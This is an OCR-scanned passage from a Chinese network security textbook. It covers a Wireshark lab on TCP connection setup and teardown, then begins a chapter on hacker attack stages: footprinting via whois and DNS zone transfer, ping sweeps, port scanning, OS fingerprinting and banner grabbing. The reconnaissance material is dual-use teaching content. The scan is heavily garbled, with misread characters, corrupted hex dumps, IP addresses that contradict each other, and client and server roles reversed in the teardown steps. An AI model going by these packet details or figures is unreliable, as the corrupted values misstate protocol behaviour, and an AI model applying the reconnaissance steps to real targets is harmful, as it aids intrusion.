17 3.290637  192.168.1.100 220.181.126.53 TCP 54 emsd-port > http [ACK] Seq=1 Ack=1 Win=é 


192.168.1.1 
192.168.1.100 


220.181.126.53 

ji .53 HTTP 

21 3.360043 — 220.181.126.53 — 192.168.1.100 HTTP 
22 3.360094  220.101.126.53 — 192.168.1.100 TCP 60 http > emsd-port [FIN, ACK] Seq=237 Acke 

23 3.360130 — 192.168.1.100  220.181.126.53 TCP 54 emsd-port > http [ACK] Seq-272 Acke238 » 
| » 


dateetrue&r 


Œ Frame 14: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 

Œ Ethernet II, Src: IntelCor 85:1f:b7 (00:13:20:85:1f:b7), Ost: Tp-LinkT e4:c8:ce (e0:05:c5:ed:cü:ce) 
困 Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Dst: 220.181.126.53 (220.181.126.53) 

国 


0000 e0 05 c5 e4 c8 ce 00 13 20 85 1f b7 08 00 45 00 
0010 00 34 84 do 40 00 40 06 98 fc cO a8 01 64 dc bs 
0020 7e 35 07 88 00 50 08 5d bc 91 00 00 00 00 80 02 
0030 fa fo 8a 69 00 00 02 04 05 b4 01 03 03 00 01 01 
0040 04 02 


图 | Tile: “C:\Documents and Settings Admins | Packets: 12522 Displayed: 12061 Marked: 0… | Profile: Default 


图 2-28 TCP 数据 包 


过 滤 出 符合 条 件 的 数据 包 后 ,就 可 以 对 感 兴趣 的 数据 包 进行 分 析 了 。 在 数据 包 列 表 窗 
格 中 可 以 看 到 被 捕获 的 数据 包 的 基本 信息 ,包括 所 选中 数据 包 的 源 地 址 .目的 地 址 ,该 数据 
包 所 属 的 协议 等 ; 在 中 间 的 “数据 包 细节 信息 ? 窗 格 中 可 以 得 到 被 捕获 的 数据 包 的 更 多 信 
息 ,主要 包括 Frame, Ethernet I IP 和 TCP 等 节点 ,展开 这 些 节点 可 以 得 到 该 数据 包 中 携 
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带 的 更 详尽 的 信息 ,如 主机 的 MAC 地 址 (Ethernet ID IP 数据 包 结 构 中 各 字段 与 标识 的 
fË TCP 数据 包 结构 中 各 字段 与 标识 的 值 等 。 
图 2-28 中 ,序号 为 15.16 和 17 的 3 条 记录 是 TCP 的 三 次 握手 过 程 。 


3. 分 析 数 据 包 


第 一 次 握手 : 可 以 看 到 192. 168. 1. 100 用 端口 号 1928 向 HTTP 服务 器 220. 181. 126. 53 
的 80 端口 发 送 一 个 连接 请 求 。 这 个 报 文 段 的 序号 为 0,SYN= 二 1, 如 图 2-29 Bros. 


File Edit View Go Capture Analyze Statisties Telephony Tools Internals Help 


BUANA SAXTA oF Raana 


Filter: Beee Cler Apply 


16 3.290585 220.181.126.53 192.168.1.100 66 http > emsd-port [SYN, ACK] Seq=0 Acket Y D 
17 3.290637  192.168.1.100 — 220.101.126.53 54 emsd-port > http [ACK] Seqel Ackel win=64 Y| 
S 


Source port: emsd-port (1928) 

Destination port: http (80) 

[Stream index: 1] 

Sequence number: 0 (relative sequence number) 
Header length: 32 bytes 


000. .... s... = Reserved: Not set 
. = Nonce: Not set 
. = Congestion window Reduced (CWR): Not set 
+ = ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: Not set 
Push: Not set 
. = Reset: Not set 
E] 

& [Expert Info (Chat/sequence): Connection establish request (SYN): server port http] 
[Message: Connection establish request (SYN): server port http] 
[Severity level: Chat] 

[Group: Sequence] 
sese 0 = Fin: Not set 
window size value: 64240 
[calculated window size: 64240] 
Ej Checksum: 0x8a69 [validation disabled] 
[Good checksum: False] 
[Bad Checksum: False] 


Q0 34 84 do 40 00 40 06 98 fc CO a& 01 64 dc bs 
7e 35 07 88 00 50 08 5d bc 91 00 00 00 00 80 02 
fa fü 8a 69 00 Q0 02 04 05 b4 01 03 03 00 01 01 
04 02 


|| File: "Ci \hocments and SettingsWdnin-- | Packets: 12522 Displayed: 12081 Marked: 0 - | Profile: Default 


图 2-29 建立 连接 第 一 次 握手 


第 二 次 握手 : HTTP 服务 器 220. 181. 126. 53 用 80 端口 向 客户 端 192. 168. 1. 100 的 端 
口号 1928 确认 刚才 的 连接 请 求 。 这 个 报 文 段 的 序号 为 0, 确认 序 号 为 图 2-29 中 客户 端 发 送 
的 报 文 段 序 号 十 1 ,也 就 是 0 十 1 一 1,SYN 一 1,ACK 一 1, 如 图 2-30 所 示 。 

第 三 次 握手 : 客户 端 发 送 一 个 带 序号 的 报 文 对 服务 器 刚才 发 送 的 报 文 进行 确认 。 这 次 
发 送 的 报 文 的 序号 为 1, 确 认 序号 为 图 2-30 中 服务 器 发 送 的 报 文 段 序 号 十 1, 也 就 是 0 十 1， 
SYN-O0.ACK- 1, Jn 2-31 所 示 。 
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Id. Hi Wie Go Cute Analyze Statistics Telephony Tools Intends Help — z 
gasaseandxenue»ov£jBaaamawEmSX 加 


Filter: | te M Egressien. Chear 


Source port: http (30) 

Destination port: emsd-port (1928) 

[Stream index: 1] 

Sequence number: 0 (relative sequence number) 
Acknowledgement number: 1 ^ (relative ack number) 
Header length: 32 bytes 


= Reserved: Not set 
= nonce: Not set 
= Congestion Window Reduced (CWR): Not set 
ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: set 
0... = Push: Not set 
.0.. = Reset: Not set 


S [Expert Info (chat/Sequence): Connection establish acknowledge (SYN+ACK): server port http] 
[Message: Connection establish acknowledge (SYNeACK): server port http] 
[Severity level: chat] 
[Group: Sequence] 
eee ere ee Fin: NOU set 
Window size value: 65535 
[Calculated window size: 65535] 
E Checksum: Oxbiéb [validation disabled] 
[Good Checksum: False] 


M 


00 13 20 85 1f b7 e0 05 cS e4 ca ce 08 00 45 00 
00 34 99 cd 40 00 38 06 Bb ff dc bs 7e 35 cO as 
Oi 64 00 50 07 88 72 23 62 CC 08 Sd bc 92 80 12 
TE fE bI cb oo oo 02 04 05 ad 01 03 03 03 04 02 ikue siii 


Tile: “C:\Documents wd Settings Adnin Packets. 12522 Displayed: 12001 Marked: 0 ~ | Profile: Defeult 


图 2-30 建立 连接 第 二 次 握手 


Hile Edit View Go Capture Mnalyre Statistics Telephony Tools Internals Help 
TTT UTET TESES FI COOLEEE ELET: 


Filter: |tep Hepression.. Cler Apply 


o. Tine Source Destination 
15 3,264274 — 192.168.1.100 320.181.126.53 


16 3.290585  220.181.126.53 — 192.168.1.100 TCP emsd-port [SYN, ACK] Seq=0 Ackel v 


rt > http [ACK] Séqel Ackel Wine 


Œ Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Ost: 220.181.126.53 (220.181.126.53) 
E Transmission control Protocol, Sre Port: emsd-port (1926), Ost Port: http (80), Seq: 1, Ack: 1, Len: 0 
Source port: emsd-port (1928) 
Destination port: http (80) 
[Stream index: 1] 
Sequence number: 1 (relative sequence number) 
Acknowledgement number: 1 (relative ack number) 
Header length: 20 bytes 
B Flags: 0x10 (ACK) 
000. s... = Reserved: Not set 
= Nonce: Not set 
Congestion window Reduced (CWR): Not set 
ECN-ECho: Not set 
Urgent: Not set 
Acknowledgement: set 
Push: Not set 
Reset: Not set 
= syn: mot set 
.0 = Fin: Not set 
Window size value: 64800 
[calculated window size: 64800] 
[window size scaling factor: 1] 
B Checksum: oxf403 [validation disabled] 
[Good checksum: False] 
[Bad Checksum: False] 
 [SEQ/ACK analysis] 


EO 05 cS e4 C8 ce 00 13 20 85 1f b7 08 00 45 00 
0028 84 d2 40 00 40 O6 39 06 CO aS 01 64 dc bs 
7e 35 07 88 00 50 08 sd bc 92 72 23 82 cd 50 10 
fd 20 f4 03 00 00 


I File "C:\Documents and SettingslMdmin- | Packets: 12522 Displayed: 12091 Marked: 0 ~ | Profile: Defeult 


图 2-31 建立 连接 第 三 次 握手 
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E31 2.2 Wireshark 分 析 TCP 四 次 握手 终止 连接 过 程 


【 实 训 目的 】 

CD 学 会 Wireshark 的 使 用 方法 ,掌握 利用 Wireshark 捕获 和 分 析 数 据 包 的 方法 。 
(2) 加 深 理解 TCP 四 次 握手 过 程 ,了 解 网 络 协议 的 工作 原理 。 

(3) WMR IP, TCP 等 数据 包 格 式 。 

(D 了 解 HTTP 等 应 用 层 协 议 的 数据 包 传输 模式 。 

【 实 训 环境 】 

一 台 运 行 Windows 操作 系统 并 与 Internet 相连 的 计算 机 。 

【 实 训 内 容 】 


1. TCP 四 次 握手 


终止 TCP 连接 ,需要 四 次 握手 ; 因为 TCP 连接 是 全 双 工 通信 ,因此 每 个 方向 必须 单独 
进行 关闭 。TCP 连接 的 终止 过 程 如 下 。 

CD 发 送 关闭 的 一 方 ( 即 发 送 第 一 FIN ,一 般 是 客户 端 ) 将 执行 主动 关闭 , 而 另 一 方 ( 收 
到 这 个 FIN) 执 行 被 动 关闭 。 通 常 一 方 完成 主动 关闭 , 另 一 方 完成 被 动 关闭 。 

(2) 当 接收 方 (服务 器 端 ) 收 到 关闭 方 发 送 方 的 FIN,TCP 服务 器 向 应 用 程序 传送 一 个 
文件 结束 符 ,然后 它 发 回 一 个 ACK ,确认 序号 为 收 到 序号 加 1, 和 SYN 一 样 ,一 个 FIN 将 占 
用 一 个 序号 。 

(3) 服务 器 端 关闭 它 的 连接 , 它 又 向 TCP 客户 端 发 送 另 一 个 FIN。 

(4) 当 客 户 端 收 到 服务 器 端 发 送 的 FIN ,客户 端 就 必须 发 回 一 个 确认 ,并 将 确认 序号 设 
置 为 收 到 序号 加 1 。 


2. 过 滤 数据 包 


从 图 2-11 捕获 的 数据 包 中 ,过 滤 TCP 数据 包 显 示 的 信息 如 图 2-32 Bros ,序号 为 22、 
23,26 和 27 的 4 条 记录 是 TCP 的 终止 握手 过 程 。 


3. 分 析 数 据 包 


(1) 第 一 次 握手 : 客户 端 220. 181. 26. 53 用 端口 80 对 服务 器 192. 168. 1. 100 端口 
1928 发 送 一 个 序号 为 237 的 FIN 报 文 ,FIN==1,ACK=1, 如 图 2-33 所 示 。 

(2) 第 二 次 握手 : 服务 器 192. 168. 1. 100 用 端口 1928 对 客户 端 220. 181. 26. 53 端口 
80 发 送 一 个 序号 为 272 的 确认 报 文 , 它 的 ACK 序号 为 238(237 十 1) ,ACK 王 1, 如 图 2-34 
所 示 。 

O 第 三 次 握手 : 服务 器 端 又 发 送 了 一 个 序号 为 272 的 FIN 报 文 ,可 以 看 到 这 个 报 文 
的 序号 和 ACK 序号 与 上 面 一 个 报 文 一 样 ,FIN 二 1,ACK 二 1, 如 图 2-35 所 示 。 
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File Edit View Go Capture Analyze Statistics Telephony Tools lenals- 了 lp 
CE 


Filter: | Expression... 


Destination Protocol Length Info 


192.168.1.100 
€— 

220.181.126.53 
25 3.400686 220.181.126.53 
26 3.400699 — 192.168.1.100 — 220.181.126.53 54 emsd-port > http [FIN, ACK] Seq=272 Ack=238 Wil 
27 3.435940 220.181.126.53 — 192.168.1.100 60 http > emsd-port [ACK] Seq=238 Acke273 Win=662: 
28 8.669314  192.168.1.100 ^ 220.161.15.150 54 persona > http [FIN, ACK] Seq=l Ack=l Win=6480! 
29 8.669329 220,181.15.150 54 persona > http [FIN, ACK] Segel Ackel Win=64801 g 


Œ Frame 22: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) 
@ Ethernet II, Src: Tp-LinkT e4:c8:ce (e0:05:cs:e4:c8:ce), Ost: IntelCor 85:1f:b7 (00:13:20:85:1f:07) 


8) Internet 


00 13 20 85 1f b7 e0 05 c5 e4 C8 Ce 08 00 45 00 
00 28 9c 01 40 00 38 06 89 ds dc b5 7e 35 cO a8 
01 64 Q0 50 07 88 72 23 63 b9 08 5d bd al 50 11 
20 58 ce d0 00 00 00 00 00 00 00 00 


Tile: "C. ocusents and Settings\Admim | Packets: 12522 Displayed. 12522 Marked: O Lowd ti^ 


图 2-32 TCP 数据 包 


Hile Edit View Go Capture Analyze Statistics Telephony Jools Internas Help 
Baaaacugxesteeoezzi[|Bmaaamasmexig 
Hilter: | S| Expression 

u Destination Pretocol Length Info 


22 3.360094 http 


23 3.360130 220.181.126.53 


25 3.400686 220.181.126.53 54 emsd-port > http [FIN, ACK] SeQe272 Acke238 Wii 
26 3.400699 — 192.168.1.100 220.181.126.53 54 ems-port > http [FIN, ACK] Seq=272 Acke238 wii 
220.181.126.53 — 192.168.1.100 60 http > emsd-port [ACK] Sege238 Ack=273 Win=662: xi 


TEE 
Destination port: emsd-port (1928) 
[Stream index: 1] 
sapanca aber: 217. (raatve Sence nnb) 
Arknodisdgement mier: 7p (elarive ark nuntar) 
Header length: 20 bytes 
E pn aay LLL LJ L 
F onca: ok ser 
Congestion windo» Reduced (OR): Mot set 
US C eokactur Not sat 
gent: Vor sar 
Cknowledgement: Set 
niet Mot sat 
DIE A OE bt set 
5 C — — — 
5 [Expert Info (chat/sequence): Connection finish (FIN)) 
[Message: Connection finish (FIN)] 
[Severity level; chat] 
[arapi Sequence] 
Windi rize values erzo 


00 13 20 85 1f b7 e0 05 cS e4 c8 ce 08 00 45 00 
00 28 3c 03 40 00 38 06 89 ds dc bs 7e 35 cO a8 
01 64 00 50 07 88 72 23 63 b9 08 5d bd ai 50 11 
20 58 ce do 00 00 00 00 00 00 00 00 


File: "C:\Documents and Settingsldsin-- | Packets: 12522 Displayed: 12522 Marked: 0 Low tim | Profile 


E 2-33 终止 连接 第 一 次 握手 


第 2 章 TCP/1P 分 析 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
Sawda BAXSA G» FBE] 


Filter: M Expression.. Clear 


io. — Time Source Destination. Protocol Length Info ^| 
22 3.360094 — 220.181.126.53 — 192.168.1.100 60 herp > emsd-port [FIN, ACK] Seq=237 Ack=272 Wi 一 


25 3.400686 192.168.1.100 。 220.181.126.53 54 emsd-port > http [FIN, ACK] Seq=272 ACKe238 Wil 
26 3.400699 192.168.1.100 。 220.181.126-53 54 emsd-port > http [FIN, ACK] Seq=272 Ack=238 wit 
27 3.435940 220.181.126.53 — 192.168.1.100 6o http > emsd-port [ACK] Seqe238 Acke273 Win=662: x 
" ] 
Œ Internet Protocol, Src: 192.168.1.100 (192.160.1.100), Dst: 220.191.126.53 (220.181.126.53) 
E Transmission control Protocol, Src Port: emsd-port (1928), Dst Port: http (80), Seq: 272, Ack: 236, Len: 0 
Source port: emsd-port (1928) 
Destination port: http (80) 
[Stream index: 1] 
Sequence number: 272 (relative sequence number) 
Acknowledgement number: 238 (relative ack number) 
Header length: 20 bytes 
Flags: 0x10 (ACK) 
000. .... .... = Reserved: Not set 
ET = Nonce: Not set 
= Congestion window Reduced (CWR): Not set 
ECN-Echo: Not set 
7 Urgent: Not set 
= Acknowledgement: 
= Push: Not set 
p .0.. = Reset: Not set 
NI 0。 = Synt Not set 
cH 20 = Fin: Not set 
Window size value: 64564 
[calculated window size: 64564] 
[Window size scaling factor: 1] 
i Checksum: oxf2f3 [validation disabled] 
 [SEQ/ACK analysis] 


Pile Edit Vier Go Capture Amalyre Statisties Telephony Tools Internals Help 


TTTTIETETITTIECETEFUSHSEGCUTTTETIT 


Filter M Expression. 
Tine Source. Destination. Protocol Length Info 
22 3.360094 220.181,126.53  192.169.1.100 TCP 60 http > emsd-port [FIN, ACK] Seq=237 Ack=272 Wii 
23 3.360130  192.168.1.100 ^ 220.181.126.53  TCP S4 emsd-port > http [ACK] Seqe272 ACke238 Win=6451 
3.3 1 TCI TCP D 341] en K 
25 3.400686 — 192.168.1.100 ^ 220.181.116.53 TCP S4 emsd-port > http [FIN, ACK] Ec 'ACke238 wit 


27 3.435940 220.161.126.53 — 192.168.1.100 TCP 0 http > emsd-port [ACK] SeQe236 Ack=273 Win=662: v. 
P | 

Œ Internet Protocol, Src: 192.168.1.100 (192.168.1.100), Dst: 220.181,126.53 (220.181.126.53) 
l ransmsston contrat Protocol, Sre Port: ered-port (1928), Ost Porti hetp (80), Segi 372, Ane zi temo C 

Source port: emsd-port (1928) 

Destination port: http (80) 

[Stream index: 1] 

Sequence number: 272 (relative sequence number) 

Acknowledgement number: 238 — (relative ack number) 

Header length: 20 bytes 


erre Rerervedt NOE sat 
JL Compii ton id mannd (CORO) Wok a 
2 Zogoeitctor tot ser 
S igenes Mut set 
E Akna edge ur 
29. c Reset: Mot set 
2.0, * Sys: Wt set 
i UESETOPRUONUMENMCD C ————X 
G [Expert Info (chat/Sequence): Connection finish (FIN)] 
[Message: Connection finish (FIN)] 
[severity level: chat] 
[eaa eee 


0000 eo 05 cs e4 c8 ce 00 13 20 85 1f b7 08 00 45 00 
0010 00 28 84 d6 40 00 40 06 39 02 cO as 0l 64 dc bs 
0020 7e 35 07 88 00 50 08 Sd bd al 72 23 63 ba 50 11 
0030 fc 34 f2 f2 00 00 


Tile: "C Uocuents and SettingslMmin-- | Packets: 12522 Displayed: 12522 Marked: 0 Load ti- | Profile: Default 


图 2-35 终止 连接 第 三 次 握手 
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Nx 


(4) 第 四 次 握手 : 客户 端 发 送 一 个 序号 为 238 的 确认 报 文 , 它 的 ACK 序号 为 
273(272 十 1) ,ACK=1, 如 图 2-36 所 示 。 


Eile Edit View Go Capture Analyze Statistics Telephony Tools Intermds Help 
üaseanuxeaanesozziEBaaamngwERXi 


Filter: | v 


No. — Tine Source Destination Frotocol Length Info ^| 
22 3.360094  220.181.126.53 — 192.168.1.100 TCP 60 http > emsd-port [FIN, ACK] Seq=237 Acke272 Wit— 
23 3.360130 — 192.168.1.100 ^ 220.181.126.53 54 emsd-port > http [ACK] Seq=272 Acke238 winecasi 
25 3.400686 1 220.181.126.53 54 emsd-port > http [FIN, ACK] Seq=272 Ack-238 wir 
26 3.400699 220.181.126.53 54 emsd-port > http [FIN, ACK] Seq=272 Acke238 wir 
27 3.435940 — 220.181.126.5 32.168. 1.100 60 > ] Seq=238 Ack=273 Wi 


G Internet Protocol, Src: 220.181.126.53 (220.181.126.53), Dst: 192.168.1.100 (192.168.1.100) 
E Transmission Control Protocol, Src Port: http (80), Ost Port: emsd-port (1928), Seq: 238, Ack: 273, Lem: 0 
Source port: http (80) 
Destination port: emsd-port (1928) 
[Stream index: 1] 
Sequence number: 238 — (relative sequence number) 
Acknowledgement number: 273 (relative ack number) 
Header length: 20 bytes 
E) Flags: 0x10 (ACk) 
000. .... = Reserved: Not set 
o Nonce: Not set 
Congestion Window Reduced (CWR): Not set 
ECN-Echo: Not set 
Urgent: Not set 
Acknowledgement: Set 
= Push: Not set 
Reset: Not set 
Syn: Not set 
.0 = Fin: Not set 
window size value: 8275 
[calculated window size: 66232] 
[window size scaling factor: 8] 
Œ Checksum: Oxcedo [validation disabled] 
ig [SEQ/ACK analysis] 


00 13 20 85 1f b7 e0 05 cS e4 CB ce 08 00 45 00 .. ..... = 
Q0 28 9e c2 40 00 38 06 87 16 dc bs 7e 35 CO a8 — .(..0.8. .... 
01 64 00 50 07 88 72 23 63 ba 08 5d bd a2 5010  .d.P..ré C..] 
20 57 ce do 00 00 00 00 00 00 00 00 W. 


File: “C:\Documents and SettingsVAdain… | Packets: 12522 Displayed: 12522 Marked: 0 Load ti- | Profile: Default 


图 2-36 终止 连接 第 四 次 握手 


本 章 介绍 黑客 攻击 的 动机 、 攻 击 的 流程 ,被 攻击 对 象 的 信息 收集 ,攻击 的 手段 和 计算 机 
病毒 ,重点 介绍 信息 收集 、 网 络 攻击 技术 ,以 及 如 何 利用 工具 攻击 计算 机 系统 。 
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3.1.1 黑客 攻击 的 动机 


黑客 的 动机 究竟 是 什么 ? 在 回答 这 个 问题 之 前 ,应 对 黑客 的 种 类 有 所 了 解 ,原因 是 不 同 
种 类 的 黑客 动机 有 着 本 质 的 区 别 。 从 黑客 行为 上 划分 ,黑客 有 "善意 ”和 "恶意 ”两 种 , 即 所 谓 
的 白 帽 (white hat) 和 黑 帽 (black hat) 。 白 帽 利用 他 们 的 技能 做 一 些 善事 , 而 黑 帽 则 利用 他 
们 的 技能 做 一 些 恶 事 。 白 帽 长 期 致力 于 改善 计算 机 社会 及 其 资源 ,为 了 改善 服务 质量 及 产 
品 , 他 们 不 断 寻找 弱点 及 脆弱 性 并 公布 于 众 。 例 如 ,为 了 找 出 程序 的 安全 漏洞 ,帮助 生产 厂 
家 改进 他 们 的 产品 , 白 帽 做 了 大 量 的 安全 上 的 测试 工作 ,他们 所 做 的 工作 实际 上 是 一 种 公众 
测试 形式 。1. 5 节 已 经 对 黑客 的 动机 做 了 描述 ,本 节 不 再 说 明 。 


3.1.2 黑客 攻击 的 流程 


尽管 黑客 攻击 系统 的 技能 有 高 低 之 分 ,入 侵 系统 手法 多 种 多 样 , 但 他 们 对 目标 系统 实施 
攻击 的 流程 大 致 相同 。 其 攻击 过 程 可 归纳 为 以 下 9 个 步骤 : 踩点 (foot printing)、 扫 描 
(scanning)、 查 点 ( enumeration) , 获取 访问 权 (gaining access) , 权限 提升 (escalating 
privilige) .窃取 (pilfering) ,掩盖 踪迹 (covering track) 、 创 建 后 门 (creating back doors) 和 拒 
绝 服务 攻击 (denial of service) 。 黑 客 攻击 流程 如 图 3-1 所 示 。 


1. 踩点 


“踩点 "原意 为 策划 一 项 盗窃 活动 的 准备 阶段 。 举 例 来 说 , 当 盗 贼 决 定 抢劫 一 家 银行 时 ， 
他 们 不 会 大 播 大 摆 地 走 进去 直接 要 钱 ,而 是 狠 下 一 番 工 夫 来 搜集 这 家 银行 的 相关 信息 ,包括 
武装 押运 车 的 路 线 及 时 间 摄像 头 的 位 置 、 逃 跑 出 口 等 信息 。 在 黑客 攻击 领域 “踩点 "是 传 
统 概念 的 电子 化 形式 。“ 踩 点 ”的 主要 目的 是 获取 目标 的 如 下 信息 : 因特网 网 络 域名 、 网 络 
地 址 分 配 域 名 服务 器 、 邮 件 交 换 主机 和 网 关 等 关键 系统 的 位 置 及 软 硬 件 信息 ; 内 联网 和 
Internet 内 容 类 似 , 但 主要 关注 内 部 网 络 的 独立 地 址 空间 及 名 称 空间 ; 远程 访问 模拟 /数字 
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使 用 Whois、DNS 、Google 收 集 目 


P 标 信息 
! 利用 躁 点 结果 ， 查 看 目标 系统 在 旦 
nii 些 通道 使 用 哪 此 服务， 以 及 使 用 的 是 
什么 操作 系统 等 
和 根据 扫 措 ， 使 用 与 特定 操作 系统 / 
EA MAERU EF 
资源 及 export 等 信息 
发 起 攻击 
拒绝 服务 攻击 | [mmen] — Etna 
1 改变 、 添加、 出 除 及 复制 用 户 
i he» 
m 修改 而 除 系统 日 志 
SHEET] — 为 以 后 再 次 入 侵 敌 准备 
图 3-1 黑客 攻击 流程 


电话 号 码 和 VPN 访问 点 ; 外 联网 与 合作 伙伴 及 子 公 司 的 网 络 的 连接 地 址 .连接 类 型 及 访问 
控制 机 制 ; 开放 资源 未 在 前 4 类 中 列 出 的 信息 ,例如 Usenet、 雇 员 配 置 文 件 等 。 

为 达到 以 上 目的 ,黑客 常 采用 以 下 技术 。 

(1) 开放 信息 源 搜索 。 通 过 一 些 标准 搜索 引擎 ,揭示 一 些 有 价值 的 信息 。 例 如 ,通过 
使 用 Usenet 工具 检索 新 闻 组 (newsgroup) 工 作 帖 子 ,往往 能 揭示 许多 有 用 的 东西 。 通 过 
使 用 Google 检索 Web 的 根 路 径 C:\\inetpub, 揭 示 目 标 系统 为 Windows 2003。 对 于 一 些 
配置 过 于 粗心 大 意 的 服务 器 ,利用 搜索 引擎 甚至 可 以 获得 passwd 等 重要 的 安全 信息 
文件 。 

(2) whois 查询 。Whois 是 目标 Internet 域名 注册 数据 库 。 目 前 ,可 用 的 whois 数据 库 
很 多 ,例如 ,查询 com ,net edu 及 org 等 结尾 的 域名 可 通过 http://www. networksolutions. 
com 得 到 ,而 查询 美国 以 外 的 域名 则 应 通过 查询 http://www. allwhois. com 得 到 相应 
whois 数据 库 服务 器 的 地 址 后 完成 进一步 查询 。 

通过 对 whois 数据 库 的 查询 ,黑客 能 够 得 到 以 下 用 于 发 动 攻击 的 重要 信息 : 注册 机 构 ， 
得 到 特定 的 注册 信息 和 相关 的 whois 服务 器 ; 机 构 本 身 , 得 到 与 特定 目标 相关 的 全 部 信息 ; 
域名 ,得 到 与 某 个 域名 相关 的 全 部 信息 ; 网 络 , 得 到 与 某 个 网 络 或 IP 相关 的 全 部 信息 ; 联系 
点 (POC) ,得 到 与 某 个 人 (一 般 是 管理 联系 人 ) 的 相关 信息 。 

例如 ,通过 www. networksolutions. com 查询 到 的 IBM 公司 的 信息 如 图 3-2 所 示 。 

(3) DNS 区 域 传送 。DNS 区 域 传送 是 一 种 DNS 服务 器 的 元 余 机 制 。 通 过 该 机 制 , 辅 
DNS 服务 器 能 够 从 主 DNS 服务 器 更 新 自己 的 数据 ,以 便 主 DNS 服务 器 不 可 用 时 , 辅 DNS 
服务 器 能 够 接替 主 DNS 服务 器 工作 。 正常 情况 下 ,DNS 区 域 传送 只 对 辅 DNS 服务 器 开 
放 。 然 而 , 当 系 统管 理 员 配置 错误 时 ,将 导致 任何 主机 均 可 请 求 主 DNS 服务 器 提供 一 个 区 
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M 


[SE com WHOIS domain registration i- 


Registrant: Make this info private 
International Business Machines Corporation 

New Orchard Road 

Armonk, NY 10504 

us 


Domain Name: IBM.COM, 


Promote your business to millions of viewers for only $1.25 a month! 
Learn how you can get an Enhanced Business Listing here for your domain name. Learn Aore 


Administrative Contact : 
IBM DNS Admin 
dnsadmBus.ibm.com 

IBA Corporation 

New Orchard Road 
Armonk, NY 10504 

Us 

Phone: +1.9147654227 
Fax: +1,9147654370 


[IBN con WHOIS domain registration i 


Technical Contact : 
IBM Corporation 
ipregðus.ibm.com 
New Orchard Road 
Armonk, NY 10504 

us 

Phone: «1,9192544441 
Fax: &1,9147654370 


Record expires on 20-Mar-2018 
Record created on 19-Mar-1986 
Database last updated on 13-War-2009 


Domain servers in listed order: Manage DNS 
INTERNETSERVER. ZURICH. IBM. COA 195.176.20.204 
NS. WATSON, BM. COM 129.34.20.80 
NS. ALMADEN. IBM.COM 198.4,83.35 
NS, AUSTIN. IBAN. COM. 192.35.232.34 


图 3-2 IBM 公司 信息 


域 数据 的 备份 ,以 致 目标 域 中 所 有 主机 信息 泄露 。 能 够 实现 DNS 区 域 传送 的 常用 工具 有 
dig.nslookup 及 Windows 版 本 的 Sam Spade. 


2. 扫描 


踩点 已 获得 一 定 信息 (IP 地 址 范围 .DNS 服务 器 地 址 和 邮件 服务 器 地 址 等 ), 下 一 步 需 
要 确定 目标 网 络 范围 内 哪些 系统 是 “活动 ”的 ,以 及 它们 提供 哪些 服务 。 与 盗窃 案 的 踩点 相 
比 ,扫描 就 像 是 辨别 建筑 物 的 位 置 并 观察 它们 有 哪些 门窗 。 扫 描 的 主要 目的 是 使 攻击 者 对 
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攻击 的 目标 系统 所 提供 的 各 种 服务 进行 评估 ,以便 集中 精力 在 最 有 和 希望 的 途径 上 发 动 攻击 。 

扫描 中 采用 的 主要 技术 有 Ping 扫射 (ping sweep)、 端 口 扫描 ,操作 系统 检测 及 旗 标 
(banner) 的 获取 。 

(D Ping 扫射 。Ping 扫射 是 判别 主机 是 否 “ 活 动 * 的 有 效 方式 。Ping 用 于 向 目标 主机 
发 送 ICMP 回 射 请 求 (echo request) 分 组 ,并 期 待 由 此 引发 的 表明 目标 系统 “活动 ”的 回 射 应 
答 (echo reply) 分 组 。 常 用 的 Ping 扫射 工具 有 操作 系统 的 Ping 命令 及 用 于 扫射 网 段 的 
fping、WS_ping 等 。 

(2) 端口 扫描 。 端 口 扫描 就 是 连接 到 目标 主机 的 TCP 和 UDP 端口 上 ,确定 哪些 服务 
正在 运行 及 服务 的 版 本 号 ,以 便 发 现 相应 服务 程序 的 漏洞 。 著 名 的 扫描 工具 有 superscan 
及 NetScan Tool ProCwww. nwpsw. com) 

(3) 操作 系统 检测 。 由 于 许多 漏洞 是 和 操作 系统 紧密 相关 的 ,因此 ,确定 操作 系统 类 型 
对 于 黑客 攻击 目标 来 说 也 十 分 重要 。 目 前 用 于 探测 操作 系统 的 技术 主要 可 以 分 为 两 类 : 利 
用 系统 旗 标 信息 ,利用 TCP/IP 堆栈 指纹 。 每 种 技术 进一步 细 分 为 主动 鉴别 和 被 动 鉴别 。 
目前 ,常用 的 检测 工具 有 Nmap, Queso 和 Siphon, 

(4) 旗 标 获取 。 在 旗 标 获取 方法 中 ,使 用 一 个 打开 端口 来 联系 和 识别 系统 提供 的 服务 
及 版 本 号 。 最 常用 的 方法 是 连接 到 一 个 端口 , 按 Enter 键 几 次 ,看 返回 什么 类 型 的 信息 。 

例如 : 
MNetat svr £V] Telnet 192.168.5.33 22 
SSH- 1. 99 - OpenSSH 3. 1p1 
表明 该 端口 提供 SSH 服务 ,版 本 号 为 3. 1p1 。 
(5) 安全 措施 探查 。 目 前 ,一 般 的 网 络 服务 器 都 会 配置 安全 防护 设备 ,基本 的 有 防火 
墙 \ 入 侵 检 测 ,一 些 重要 的 安全 服务 器 会 配置 蜜 护 系统 、 防 DoS 攻击 系统 和 过 滤 邮 件 等 。 在 
扫描 过 程 中 根据 扫描 结果 ,需要 判断 目标 使 用 了 哪些 安全 防护 措施 。 
获取 的 内 容 包 括 : 
。 获取 目标 的 网 络 路 径 信息 。 目 标 网 段 信息 : 确认 目标 所 在 的 网 段 、 掩 码 情况 ; 判断 
安全 区 域 划分 情况 ; 为 可 能 的 跳板 攻击 做 准备 。 目 标 路 由 信息 : 确认 目标 所 在 的 具体 
路 由 情况 ,判断 在 路 由 路 径 上 的 各 个 设备 类 型 ,如 是 路 由 器 三 层 交 换 机 或 防火 墙 。 

。 了 解 目标 架设 的 具体 路 由 情况 ,确认 目标 是 否 安装 了 安全 设施 。 一般 对 攻击 影响 较 
大 的 包括 防火 墙 入 侵 检 测 和 蜜 镀 系统 。 

。 了 解 目标 使 用 安全 设备 情况 。 这 对 攻击 的 隐蔽 性 影响 很 大 ,同时 也 决定 了 在 后 期 安 
